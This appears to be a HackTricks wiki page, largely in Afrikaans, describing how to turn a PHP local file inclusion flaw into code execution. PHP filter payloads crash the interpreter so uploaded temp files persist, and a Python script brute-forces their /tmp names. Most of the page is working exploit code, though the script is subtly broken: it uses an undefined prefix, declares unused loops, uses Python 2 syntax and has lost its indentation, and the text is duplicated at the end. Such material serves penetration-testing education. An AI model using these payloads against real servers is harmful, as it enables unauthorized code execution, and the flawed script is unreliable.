LFI2RCE via Segmentation Fault

Leer & oefen AWS Hack: HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hack: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kontroleer die inskrywingsplanne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacktruuks deur PR's in te dien by die HackTricks en HackTricks Cloud github repos.

Volgens die skrywes https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/ (tweede deel) en https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view, het die volgende payloads 'n segmentasie fout in PHP veroorsaak:

// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");

// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

Jy moet weet dat as jy 'n POST versoek stuur wat 'n lêer bevat, PHP sal 'n tydelike lêer in /tmp/php<something> skep met die inhoud van daardie lêer. Hierdie lêer sal outomaties verwyder word sodra die versoek verwerk is.

As jy 'n LFI vind en jy slaag daarin om 'n segmentasiefout in PHP te trigger, sal die tydelike lêer nooit verwyder word nie. Daarom kan jy daarna soek met die LFI kwesbaarheid totdat jy dit vind en arbitrêre kode uitvoer.

Jy kan die docker-beeld https://hub.docker.com/r/easyengine/php7.0 gebruik vir toetsdoeleindes.

# upload file with segmentation fault
import requests
url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
files = {'file': open('la.php','rb')}
response = requests.post(url, files=files)


# Search for the file (improve this with threads)
import requests
import string
import threading

charset = string.ascii_letters + string.digits

host = "127.0.0.1"
port = 80
base_url = "http://%s:%d" % (host, port)


def bruteforce(charset):
for i in charset:
for j in charset:
for k in charset:
for l in charset:
for m in charset:
for n in charset:
filename = prefix + i + j + k
url = "%s/index.php?i=/tmp/php%s" % (base_url, filename)
print url
response = requests.get(url)
if 'spyd3r' in response.content:
print "[+] Include success!"
return True


def main():
bruteforce(charset)

if __name__ == "__main__":
main()

Ondersteun HackTricks

Kontroleer die inskrywingsplanne!
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

PreviousLFI2RCE via PHP_SESSION_UPLOAD_PROGRESS NextLFI2RCE via phpinfo()

Last updated 4 months ago

// PHP 7.0 include("php://filter/string.strip_tags/resource=/etc/passwd"); // PHP 7.2 include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");

# upload file with segmentation fault import requests url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd" files = {'file': open('la.php','rb')} response = requests.post(url, files=files) # Search for the file (improve this with threads) import requests import string import threading charset = string.ascii_letters + string.digits host = "127.0.0.1" port = 80 base_url = "http://%s:%d" % (host, port) def bruteforce(charset): for i in charset: for j in charset: for k in charset: for l in charset: for m in charset: for n in charset: filename = prefix + i + j + k url = "%s/index.php?i=/tmp/php%s" % (base_url, filename) print url response = requests.get(url) if 'spyd3r' in response.content: print "[+] Include success!" return True def main(): bruteforce(charset) if __name__ == "__main__": main()